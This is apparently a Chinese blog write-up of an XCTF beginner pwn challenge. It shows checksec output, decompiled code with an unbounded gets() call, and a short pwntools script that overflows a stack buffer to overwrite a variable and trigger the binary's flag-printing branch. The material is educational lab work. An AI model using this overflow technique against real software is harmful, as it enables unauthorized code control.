2. 程式人生 > 實用技巧 >【攻防世界】:新手區 | when_did_you_born

【攻防世界】:新手區 | when_did_you_born

阿新 發佈:2020-08-01

checksec檢視程式型別: 有Canary,先看看程式邏輯

[*] '/home/zowie/Downloads/when_did_you_born'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

放入IDA反編譯看虛擬碼尋找漏洞:

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  __int64 result; 
 
// rax
  char v4; // [rsp+0h] [rbp-20h]
  unsigned int v5; // [rsp+8h] [rbp-18h]
  unsigned __int64 v6; // [rsp+18h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("What's Your Birth?");
  __isoc99_scanf("%d", &v5);
  while ( getchar() != 10 )
    ;
  
 
if ( v5 == 1926 )
  {
    puts("You Cannot Born In 1926!");
    result = 0LL;
  }
  else
  {
    puts("What's Your Name?");
    gets(&v4);
    printf("You Are Born In %d\n", v5);
    if ( v5 == 1926 )
    {
      puts("You Shall Have Flag.");
      system("cat flag");
    }
    else
    {
      puts(
 
"You Are Naive.");
      puts("You Speed One Second Here.");
    }
    result = 0LL;
  }
  return result;
}

程式中已經有現成的 system("cat flag"); 我們需要輸入不為1926的出生年份進入else中,再通過對v4的溢位覆蓋v5的值為1926

故exp:

from pwn import *

#io = process("./when_did_you_born")
io = remote("IPaddr",port)
io.sendlineafter('th?','1234')
payload = b'a' * 8 + p64(1926)
io.sendlineafter('me?',payload)

相關推薦

攻防世界新手 | when_did_you_born

checksec檢視程式型別 有Canary,先看看程式邏輯 [*] \'/home/zowie/Downloads/when_did_you_born\'

攻防世界新手 | guess number

checksec程式資訊 Arch:amd64-64-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:PIE enabled

攻防世界新手 | int_overflow

checksec: Arch:i386-32-little RELRO:Partial RELRO Stack:No canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界新手 | strings

checksec: Arch:amd64-64-little RELRO:Full RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x400000) IDA:

攻防世界新手 | CGfsb

checksec Arch:i386-32-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界新手 | CRYPTO

在正式做題前先要大致瞭解一下CRYPTO 0x1: base64 將文字內容如題解密 Y3liZXJwZWFjZXtXZWxjb21lX3RvX25ld19Xb3JsZCF9

攻防世界maze

IDA反彙編的結果 看上去確實挺草的,一堆goto和奇怪的函式,再加上題目名為迷宮,感覺很害怕

攻防世界SECCON-CTF-2014 - Decrypt-It-easy

附件給了個可執行檔案和一個加密檔案,還給了個readme告訴你加密檔案就是用可執行檔案加密的

攻防世界進階 | stack2

checksec Arch:i386-32-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界進階 | Mary_Morton

這道題讓我重新學了一遍格式化字串漏洞,自學真的太頂了。 checksec開啟了canary

攻防世界進階 | warmup

這道題感覺有點怪怪的,題目頁面並沒有給出附件,實驗了下可以開啟線上場景

戰艦世界封測結果支援航母回爐

原文網址https://blog.worldofwarships.com/blog/309 翻譯Ian_Hugh 這裡是我們支援航空母艦概念測試的結果。

資料結構樹的先序,中序,後序遍歷Python實現

我們先建立一棵簡單的二叉樹 程式碼如下所示 class TreeNode: def __init__(self, x):

攻防世界-高手進階通關筆記

高手進階-通關筆記 baby_web 根據提示想想初始頁面是哪個 我們輸入index.php發現還是回到了1.php,應該是重定向了,此處有兩種思路

SpringCloud學習筆記十四Spring Cloud Stream訊息驅動

目錄本篇要點Spring Cloud Stream概述設計思想標準的MQSpring Cloud StreamAPI及常用註解Spring Cloud Stream演示前置條件訊息驅動之生產者引入pom依賴配置yml主啟動類定義訊息的推送管道定義介面測試訊息驅動之消費

攻防世界_MISC進階_Get-the-key.txt(詳細)

攻防世界MISC進階之Get-the-key.txt 啥話也不說,咱們直接看題吧! 首先下載附件看到一個壓縮包

Python爬蟲爬取(谷歌/百度/搜狗)的搜尋結果

步驟如下1.首先匯入爬蟲的packagerequests 2.使用UA偽裝進行反反爬蟲,將爬蟲偽裝成一個瀏覽器進行上網

攻防世界之misc新手入門——掀桌子

技術標籤攻防世界wp之miscpythonpycharm經驗分享 攻防世界之misc新手入門——掀桌子

Pytorch教程Torch and Numpy

技術標籤PytorchPython 目錄 1. 自由地轉換 numpy array 和 torch tensor 2. Torch中的數學運算

前端開發使用CSS中的ID選擇器編寫Google字型樣式

技術標籤csshtmlcss3jsless ID選擇器和class類選擇器的不同是:每一個ID只能夠被html呼叫一次,而css當中所編寫的class則可以被html呼叫多次,我們使用ID選擇器編寫一個谷歌樣式的字型,如果需要選擇同樣的顏色